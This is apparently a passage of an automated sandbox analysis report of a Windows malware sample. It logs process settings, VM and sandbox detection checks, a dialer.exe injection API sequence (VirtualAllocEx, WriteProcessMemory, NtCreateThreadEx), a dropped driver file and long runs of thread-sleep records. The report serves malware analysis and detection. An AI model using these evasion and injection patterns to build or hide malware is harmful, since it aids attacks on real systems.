          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Contains functionality to compare user and computer (likely to detect sandboxes)
          Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,41_2_00000001400010C0
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
          Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
          Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6673Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1172Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7979Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5536
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4463
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9346
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 732
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8037
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 9251
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 739
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9868
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1267
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1189
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1135
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1100
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 1026
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 994
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 817
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 831
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 827
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 835
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 793
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 795
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 802
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 769
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 778
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 715
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 706
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 707
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 717
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 633
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 677
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 638
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 633
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 661
          Source: C:\Windows\System32\spoolsv.exeWindow / User API: threadDelayed 528
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 513
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 540
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 501
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 492
          Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 475
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exeDropped PE file which has not been started: C:\Windows\Temp\sidneyeifgjd.sysJump to dropped file
          Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_41-480
          Source: C:\Windows\System32\dialer.exeAPI coverage: 0.9 %
          Source: C:\Windows\System32\svchost.exe TID: 3600Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 4596Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep count: 6673 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep count: 1172 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep count: 330 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep count: 7979 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6640Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\System32\winlogon.exe TID: 2972Thread sleep count: 5536 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 2972Thread sleep time: -5536000s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 2972Thread sleep count: 4463 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 2972Thread sleep time: -4463000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 6616Thread sleep count: 9346 > 30
          Source: C:\Windows\System32\lsass.exe TID: 6616Thread sleep time: -9346000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 6616Thread sleep count: 616 > 30
          Source: C:\Windows\System32\lsass.exe TID: 6616Thread sleep time: -616000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep count: 732 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6576Thread sleep count: 8037 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6636Thread sleep count: 9251 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6636Thread sleep time: -9251000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6636Thread sleep count: 739 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6636Thread sleep time: -739000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 2212Thread sleep count: 9868 > 30
          Source: C:\Windows\System32\dwm.exe TID: 2212Thread sleep time: -9868000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7140Thread sleep count: 1267 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7140Thread sleep time: -1267000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1640Thread sleep count: 1189 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1640Thread sleep time: -1189000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6452Thread sleep count: 1135 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6452Thread sleep time: -1135000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6460Thread sleep count: 1100 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6460Thread sleep time: -1100000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 7104Thread sleep count: 1026 > 30
          Source: C:\Windows\System32\svchost.exe TID: 7104Thread sleep time: -1026000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6440Thread sleep count: 994 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6440Thread sleep time: -994000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1996Thread sleep count: 817 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1996Thread sleep time: -817000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3904Thread sleep count: 831 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3904Thread sleep time: -831000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3228Thread sleep count: 827 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3228Thread sleep time: -827000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5708Thread sleep count: 835 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5708Thread sleep time: -835000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5428Thread sleep count: 793 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5428Thread sleep time: -793000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep count: 795 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3192Thread sleep time: -795000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1904Thread sleep count: 802 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1904Thread sleep time: -802000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1944Thread sleep count: 769 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1944Thread sleep time: -769000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2424Thread sleep count: 778 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2424Thread sleep time: -778000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1868Thread sleep count: 715 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1868Thread sleep time: -715000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5860Thread sleep count: 706 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5860Thread sleep time: -706000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5824Thread sleep count: 707 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5824Thread sleep time: -707000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2504Thread sleep count: 717 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2504Thread sleep time: -717000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2120Thread sleep count: 633 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2120Thread sleep time: -633000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2268Thread sleep count: 677 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2268Thread sleep time: -677000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2060Thread sleep count: 638 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2060Thread sleep time: -638000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2196Thread sleep count: 633 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2196Thread sleep time: -633000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2132Thread sleep count: 661 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2132Thread sleep time: -661000s >= -30000s
          Source: C:\Windows\System32\spoolsv.exe TID: 2076Thread sleep count: 528 > 30
          Source: C:\Windows\System32\spoolsv.exe TID: 2076Thread sleep time: -528000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2272Thread sleep count: 513 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2272Thread sleep time: -513000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5388Thread sleep count: 540 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5388Thread sleep time: -540000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6436Thread sleep count: 501 > 30
          Source: C:\Windows\System32\svchost.exe TID: 6436Thread sleep time: -501000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4180Thread sleep count: 492 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4180Thread sleep time: -492000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2280Thread sleep count: 475 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2280Thread sleep time: -475000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 4612Thread sleep count: 241 > 30
          Source: C:\Windows\System32\svchost.exe TID: 4612Thread sleep time: -241000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3068Thread sleep count: 317 > 30
          Source: C:\Windows\System32\svchost.exe TID: 3068Thread sleep time: -317000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 3652Thread sleep count: 279 > 30
